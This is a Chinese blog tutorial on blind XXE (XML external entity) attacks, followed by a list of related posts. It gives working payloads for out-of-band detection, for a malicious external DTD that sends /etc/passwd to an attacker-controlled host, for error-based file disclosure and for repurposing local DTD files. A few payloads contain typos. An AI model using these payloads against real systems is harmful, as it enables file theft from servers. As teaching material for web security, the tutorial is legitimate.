Blind XXE漏洞详解

最新推荐文章于 2024-05-31 10:34:57 发布
最新推荐文章于 2024-05-31 10:34:57 发布
阅读量3.7k 收藏 3
点赞数
分类专栏: Web安全进阶 文章标签: Blind XXE out-of-band XML解析错误 敏感信息 DTD文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40201047/article/details/121322184
版权

0x01 blind XXE漏洞

0x02 使用out-of-band(OAST)技术检测Blind XXE漏洞

2.1 使用参数实体进行绕过

2.2 利用out-of-band获取敏感信息

0x03 利用XML解析错误信息获取敏感信息

0x04 利用本地DTD文件获取敏感信息

 

0x01 blind XXE漏洞

    XML外部实体盲注是指应用程序存在XXE漏洞,但是在响应包中无法得到任何有关外部实体的信息。这就意味着传统的XXE SSRF攻击是无法完成的,所以正常情况下Blind XXE漏洞更难利用。

Blind XXE 常用的两种利用方式

    触发out-of-band网络交互,有时会在交互数据中泄露敏感数据。

    触发XML 解析错误,通过错误消息获取到敏感数据。

0x02 使用out-of-bandOAST)技术检测Blind XXE漏洞

    可以使用我们自己可控的服务器或应用程序通过out-of-band网络交互技术来检测Blind XXE漏洞。例如:

<!DOCTYPE a [

<IENTITY xxe SYSTEM "http://c7p3st.dnslog.cn">

]>

<a>&xxe;</a>

2.1 使用参数实体进行绕过

    在有些情况下,由于应用程序对输入进行验证等措施,常规的实体注入可能会被阻拦,无法正常获取到信息,此时我们可以通过使用参数实体进行绕过。

​<!DOCTYPE a  [<!ENTITY % xxe SYSTEM "http://c7p3st.dnslog.cn"> %xxe; ]>

2.2 利用out-of-band获取敏感信息

    使用out-of-band技术只能证明应用系统存在Blind XXE漏洞,但攻击者终究是为了利用漏洞获取敏感信息。此时可以通过攻击者可控的服务器或者应用程序建立恶意的DTD文件,再在目标服务器解析加载恶意DTD,从而获取敏感信息。

# 构造请求包正常:

<!DOCTYPE a [<!ENTITY % xxe SYSTEM "http://vps/xxe.dtd"> %xxe;]>

# 构造恶意xxe.dtd:

<!ENTITY % file SYSTEM "file://etc/passwd">

<!ENTITY % extfile SYSTEM "<!ENTITY &#x25; exfiltrate SYSTEM 'http://dnslog.cn/?x=%file;'>">

%extfile;

%exfiltarte;
​

    此类技术对于/etc/passwd等文件不太友好,原因在于XML解析器是使用API获取带有恶意DTD文件的URL的,API只能验证出现在URL中的字符,这时使用FTP协议替换HTTP协议会好很多,但有时它可能不太支持换行符等字符,所以这种情况下使用/etc/host来验证漏洞比较合适一点。

0x03 利用XML解析错误信息获取敏感信息

    如果应用系统在XML的返回信息中包含错误信息,那么我们可以通过触发XML解析错误,从而获取到应用程序敏感信息。

    可以通过以下方式来触发XML解析错误信息,并且错误信息中包含/etc/passwd等应用程序敏感信息。

# 构造xxe.dtd文件

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % eval "<!ENTITY  &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

%eval;

%error;

# 构造恶意请求

<!DOCTYPE a [

<!ENTITY % xxe SYSTEM "http://vps/xxe.dtd"> %xxe; ]>
​

0x04 利用本地DTD文件获取敏感信息

    前面几种方式适合外部DTD,对于只能使用DOCTYPE内元素的内部DTD来说是没有作用的,主要原因为那些方式在参数实体中定义了另外的参数实体,根据XML规范,这在外部DTD中是允许的,但在内部DTD中是不允许的。这时候就要思考当我们的out-of-band带外技术被阻拦时,我们无法通过out-of-band获取敏感数据,也无法加载远程服务器中的DTD文件,该如何利用Blind XXE漏洞。

    此时,利用解析错误获取敏感信息还是可能的,这取决于XML语言的漏洞:如果一个DTD混合使用内部DTD和外部DTD,内部DTD可以进行重新定义由外部DTD引用的实体,这样就放宽了在另一个参数实体的定义中使用XML参数实体的限制。

    这意味着攻击者可以在内部DTD中使用基于错误的XXE技术,前提是他们使用的XML参数实体正在重新定义在外部DTD中声明的实体。当然,如果带外连接被阻止,则无法从远程位置加载外部DTD。相反,它需要是应用服务器本地的外部DTD文件。本质上,攻击涉及调用本地文件系统上碰巧存在的DTD文件,并重新调整其用途,以触发包含敏感数据的解析错误的方式重新定义现有实体。

    例如:在应用程序中存在/usr/local/app/schema.dtd,且这个DTD文件定义了一个custom_entity的实体。攻击者可以通过以下方式触发XML解析错误,从而获取到敏感数据。

<!DOCTYPE foo [

<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">

<!ENTITY % custom_entity '

<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">

<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">

&#x25;eval;

&#x25;error;

'>

%local_dtd;

]>
​

    如何寻找本地的DTD文件

    这种利用方式最重要的还是去应用程序服务器中寻找可以利用的DTD文件。这其实是特别简单的:当应用程序因为XML解析错误返回错误信息时,我们可以通过从内部DTD中加载他们来枚举出本机的DTD文件。

    例如:使用GNOME环境的Linux通常会存在/usr/share/yelp/dtd/docbookx.dtd文件,可以通过以下XXE负载来判断此文件是否存在。
 

<!DOCTYPE XXE [

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

%local_dtd;

]>

    再找到DTD文件后,可以通过网上去寻找这个DTD文件,并且分析是否可以重定义参数进行利用。

参考资料:

What is a blind XXE attack? Tutorial & Examples | Web Security Academy

Java代码审计之XXE漏洞详解
悦分享
01-24 195
除此之外,XML文档中还规定了一系列定义好的“字符引用”,使用特殊的字母组合来表示某些特殊字符,如“
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
代码讲故事
02-04 571
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用。
WeCenter3.1.7 blind xxe
u011066706的专栏
04-17 1124
xxe漏洞危害大,可以查看任意文件,执行系统命令,进行ddos等,但是本次漏洞有一条件,需要后台登录,所以危害降低了,下面是详细分析 在models/weixin.php public function fetch_message() { if ($this->post_data = file_get_contents('php://input'))
blind xxe攻击
weixin_30725467的博客
07-08 277
最近做啊里的题的时候遇到了 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html 转载于:https://www.cnblogs.com/dongchi/p/4005795.html
关于Blind XXE
weixin_30268071的博客
07-08 922
关于Blind XXE 关于XXE,很早之前内部做过分享,个人觉得漏洞本身没太多的玩点,比较有意思主要在于:不同语言处理URI的多元化和不同XML解析器在解析XML的一些特性。 在科普Blind XXE之前,假定你们已经掌握了XXE,了解了 XML, Entity, DCOTYPE, DTD等这些基础知识。 Blind XXE的原理和利用方式我在wooyun上的漏洞报告:鲜...
Blind XXE
Vicl1fe的博客
12-21 466
又到了惊心动魄的XXE学习下篇了!! Blind XXE 继 Normal XXE之后。又到了Blind XXE了。Blind XXE即无回显注入,废话不多说了。直接上代码 先来两个文件 3.php <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('1.xml'); $...
XXE漏洞详解 一文了解XXE漏洞
闵行小鱼塘
11-10 3775
本篇总结归纳XXE漏洞
XXE漏洞详解
weixin_56714714的博客
07-25 8099
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
JAVA XXE 从原理到利用
最新发布
2401_83799022的博客
05-31 1150
在搜到的文章中有一个令人在意的点,作者提到“由于是java的站,所以利用ftp协议读取文件”,java站和ftp协议有什么关系?简单来说就是将我们原本使用的远程服务器上的dtd变更为了服务器上的本地dtd,去redefine其中的参数实体,再结合报错实现回显。和正常的XXE攻击其实没有太大区别,只是把payload放到了解压后里面的xml中,然后再压缩回到pptx/word/xlsx,上传后在解析过程中就会触发XXE payload。需要关注的是最后一种,参数实体,在实际的XXE攻击中会用到。
xxe漏洞简介
u011066706的专栏
04-17 4201
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
XXE技巧拓展】————5、XXE漏洞以及Blind XXE总结
Fly_鹏程万里
12-25 1146
前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题,如开源中国的在线XML格式化工具XXE漏洞: http://www.wo...
浅析无回显的XXEBlind XXE
蚁景网安学院
05-11 1423
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
Blind XXE 漏洞利用
ak.Gh0st的博客
11-07 838
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。但是,在处理外部实体时,可以针对应用程序启动许多攻击。这些攻击包括泄露本地系统文件,这些文件可能包含密码和私人用户数据等敏感数据,或利用各种方案的网络访问功能来操纵内部应用程序。
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
xxe攻击
蚁景网安学院
11-06 444
本篇是依葫芦画瓢,进行了测试和讲解。先提醒,没有实际例子,本人挖洞经验太少,没有遇到相关例子,文末会给出合适的方法寻找,有兴趣可以去具体操作下。下面有些文字和图是不同时间配的,导致不一样...
XXE学习
willow_liang的博客
10-14 653
XXE漏洞学习 原理:XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 xml是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言.xml文档结构包括xml声明、DTD文档类型定义(可选)、文档元素. 所有的XML文档均有以下简单的构建模块组成: 元素(元素是XML以及HTML文档的主要构成模块,元素可包含文本、其他元素或者是空的) 属性(属性可提供有关元素的额外信息) 实体(实
WebGoat靶场搭建及通关记录(一)
m0re's blog
08-26 7567
文章目录前言一、搭建靶场二、通关攻略1.GeneralHTTP BasicsHTTP Proxies2.Injection FlawsSQL Injection (advanced) 前言 搭建WebGoat靶场,没事打一打。 一、搭建靶场 靶场环境,只介绍在windows系统中搭建过程。 先下载这两个文件 https://github.com/WebGoat/WebGoat/releases/download/v8.1.0/webgoat-server-8.1.0.jar https://githu
2020第五空间 web writeup
a3320315的博客
06-27 3625
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 3606
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值